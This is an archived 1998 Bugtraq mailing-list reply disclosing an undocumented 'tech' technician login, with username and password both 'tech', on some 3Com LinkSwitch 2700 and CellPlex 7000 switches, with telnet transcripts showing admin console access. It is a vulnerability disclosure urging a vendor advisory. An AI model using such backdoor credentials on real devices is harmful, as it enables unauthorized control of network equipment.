Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos



Bugtraq: Re: 3Com switches - undocumented access level.

Re: 3Com switches - undocumented access level.

From: Riku Meskanen <mesrik_at_cc.jyu.fi>
Date: Thu, 7 May 1998 21:56:26 +0300

On Wed, 6 May 1998, Durval Menezes wrote:
> Hello,
>
> > PROBLEM:
> > There appears to be a backdoor/undocumented "access level" in current (and
> > possibly previous) versions of 3Com's "intelligent" and "extended"
> > switching software for LanPlex/Corebuilder switches.
>
> Just checked my 3Com Superstack II intelligent hub and Switches (they have
> a similar Telnet interface) and they appear NOT to have this backdoor
> (humm, or does the backdoor use a different username/password? I wonder...)
>
No but unfortunately there is another "tech" user that took me
only about 20min to dig out from compressed image. Same pair
works for CellPlex 7000 :(

The username is tech, as is the password.

I'll think that 3Com should be informed to release a security
advisory ASAP.

Telnet, V1.0, 3Com NCD, 1996

LinkSwitch 2700 Rev 1.0
Software version Ver. 3.50 - Built Sep 11 1997 11:21:13

Select access level (read, write, admin): tech
Password: ****

LinkSwitch 2700 Rev 1.0 Administration Console
Accessed at tech access level.

main menu:
==========
   [1] system - Administer System level functions ->
   [2] ethernet - Administer Ethernet ports ->
   [3] bridge - Administer Bridging ->
   [4] atm - Administer ATM resources ->
   [5] le - Administer LAN Emulation Clients ->
   [6] vns - Administer Virtual Networks configuration ->
   [7] management - Administer IP and SNMP ->
   [8] quit - Logout of the administration console
   [9] fast - Fast Setup
  [10] tech - Special technician options ->

'\' - Main menu '-' - Prev menu
> quiConnection closed by foreign host.

Use tech/system/password to set new password.

Telnet, V1.0, 3Com NCD, 1996

                     -------------------------------
                     - CELLplex 7000 -
                     - -
                     - ATM Backbone Switch -
                     -------------------------------
Access level (read, write, admin):tech
Password: ****

CP7000 switch module - Main Menu:
   (1) SYS: Platform config ->
   (2) LEM: Lan Emulation ->
   (3) CON: Connections ->
   (4) STS: Statistics ->
   (5) DIA: Testing & Diagnostics ->
   (6) FTR: ATM features
   (7) LOG: Logout
   (8) VER: Version
   (9) FST: Fast Setup
  (10) DBG: Debug ->
[ '\' -Main, '-' -Back in menus]
[ '=0'-To switch, '=n'-To i/f card n (1-4)]
>
>7
Connection closed by foreign host.

Use (1)SYS\(1)SET\(2)PAS> to set new password.

Ok, now how about models 1000 and 3000 ?

:-) riku 

--
    [ This .signature intentionally left blank ]
Received on May 07 1998
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
edgeos